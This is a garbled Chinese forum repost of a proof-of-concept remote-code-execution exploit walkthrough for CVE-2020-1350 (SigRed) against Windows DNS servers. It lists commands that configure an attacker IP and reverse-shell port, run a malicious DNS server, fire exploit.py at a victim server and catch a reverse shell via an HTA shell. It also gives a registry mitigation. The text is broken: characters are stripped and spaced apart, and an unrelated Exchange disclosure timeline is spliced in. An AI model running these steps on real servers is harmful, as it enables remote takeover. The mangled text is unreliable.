搜索

[28798] 2021-03-11_适用于CVE-2020-1350SigRed的PoC远程代码执行漏洞利用。

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-19
2021-03-11_适用于CVE-2020-1350SigRed的PoC远程代码执行漏洞利用。 C V E - 2 0 2 0 - 1 3 5 0   S i g R e d P o C O t s   2 0 2 1 - 0 3 - 1 1 c h o m p i e 使 使 h t t p s : / / w w w . g r a p l s e c u r i t y . c o m / p o s t / a n a t o m y - o f - a n - e x p l o i t - r c e - w i t h - c v e - 2 0 2 0 - 1 3 5 0 - s i g r e d / T o o l - >   D N S
I n t e r n e t . . .   n s 1 [ y o u r e v i l d o m a i n ] I n t e r n e t D N S h t t p s : / / w w w . l i n u x u p r i s i n g . c o m / 2 0 2 0 / 0 7 / u b u n t u - h o w - t o - f r e e - u p - p o r t - 5 3 - u s e d - b y . h t m l 5 3 D N S L i n u x 使 U b u n t u   2 0 . 0 4 . 1   V M H T A   S h e l l A p a c h e s u d o U D P T C P 5 3 s h e l l o s . s y s t e m ( ' s y s t e m c t l   s t o p   s y s t e m d - r e s o l v e d ' ) e v i l d n s . p y s u d o   p y t h o n 3   c o n f i g u r e . p y   - i p   I P _ A T T A C K E R   - p   P O R T _ R E V E R S E _ S H E L L   - h p   P O R T _ A P A C H E _ S E R V E R   ( d e f a u l t   8 0 ) s u d o   p y t h o n 3   e v i l d n s . p y p y t h o n 3   e x p l o i t . p y   - i p   W I N D N S _ V I C T I M _ I P   - d   E V I L _ D O M A I N p y t h o n 3   r e v e r s e _ s h e l l / s e r v e r . p y   - p   P O R T _ R E V E R S E _ S H E L L
H T A   s h e l l h t t p s   :   / / g i t h u b . c o m / f r e s h n e s s 7 9 / H T A - S h e l l s h e l l W i n d o w s   S e r v e r   2 0 1 9 2 0 1 6 2 0 1 2 R 2 2 0 1 2 x 6 4 d n s . e x e m s v c r t . d l l o f f s e t s . p y d n s . e x e 1 2 d n s ! R R _ F r e e d n s ! ` s t r i n g ` d n s ! R R _ F r e e d n s ! N s e c D n s R e c o r d C o n v e r t d n s ! _ i m p _ e x i t   m s v c r t . d l l 1 2 m s v c r t ! e x i t m s v c r t ! e x i t m s v c r t ! s y s t e m D N S 5 e v i l d n s . p y P o C S i g R e d G r a p l S I E M d n s . e x e 使 2 0 2 0 1 0 1   D E V C O R E M i c r o s o f t   E x c h a n g e   S e r v e r 2 0 2 0 1 2 1 0   D E V C O R E C V E - 2 0 2 1 - 2 6 8 5 5 2 0 2 0 1 2 2 7   D E V C O R E 2 0 2 0 1 2 3 0   D E V C O R E C V E - 2 0 2 1 - 2 7 0 6 5 2 0 2 0 1 2 3 1   D E V C O R E R C E 2 0 2 1 1 5   D E V C O R E M S R C M i c r o s o f t 1 8 : 4 1   + 8 2 0 2 1 1 6   M S R C M S R C 6 2 8 9 9 2 0 2 1 1 6   M S R C M S R C 6 3 8 3 5 2 0 2 1 1 8   M S R C 2 0 2 1 1 1 1   D E V C O R E M S R C 1 2 0 b u g 2 0 2 1 1 1 2   M S R C 2 0 2 1 2 2   D E V C O R E 2 0 2 1 2 2   M S R C 2 0 2 1 2 1 2   M S R C 2 0 2 1 2 1 3   D E V C O R E 2 0 2 1 2 1 8   D E V C O R E M S R C 2 0 2 1 2 1 8   M S R C 3 / 9 2 0 2 1 2 2 7   M S R C 2 0 2 1 2 2 8   D E V C O R E 2 0 2 1 3 3   M S R C 2 0 2 1 3 3   M S R C D E V C O R E 2 0 2 1 3 3   V o l e x i t y D E V C O R E 2 0 2 1 3 4   D E V C O R E M S R C 2 0 2 1 3 5   D E V C O R E h t t p s : / / g i t h u b . c o m / c h o m p i e 1 3 3 7 / S I G R e d _ R C E _ P o C h t t p s : / / r e s e a r c h . c h e c k p o i n t . c o m / 2 0 2 0 / r e s o l v i n g - y o u r - w a y - i n t o - d o m a i n - a d m i n - e x p l o i t i n g - a - 1 7 - y e a r - o l d - b u g - i n - w i n d o w s - d n s - s e r v e r s / h t t p s : / / g i t h u b . c o m / c h o m p i e 1 3 3 7 / S I G R e d _ R C E _ P o C h t t p s : / / d a t a f a r m - c y b e r s e c u r i t y . m e d i u m . c o m / e x p l o i t i n g - s i g r e d - c v e - 2 0 2 0 - 1 3 5 0 - o n - w i n d o w s - s e r v e r - 2 0 1 2 - 2 0 1 6 - 2 0 1 9 - 8 0 d d 8 8 5 9 4 2 2 8 p y t h o n 3   r e v e r s e _ s h e l l / s e r v e r . p y   - p   P O R T _ R E V E R S E _ S H E L L r e g   a d d   " H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t S e r v i c e s D N S P a r a m e t e r s "   / v   " T c p R e c e i v e P a c k e t S i z e "   / t   R E G _ D W O R D   / d   0 x F F 0 0   / f n e t   s t o p   D N S   & &   n e t   s t a r t   D N S

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理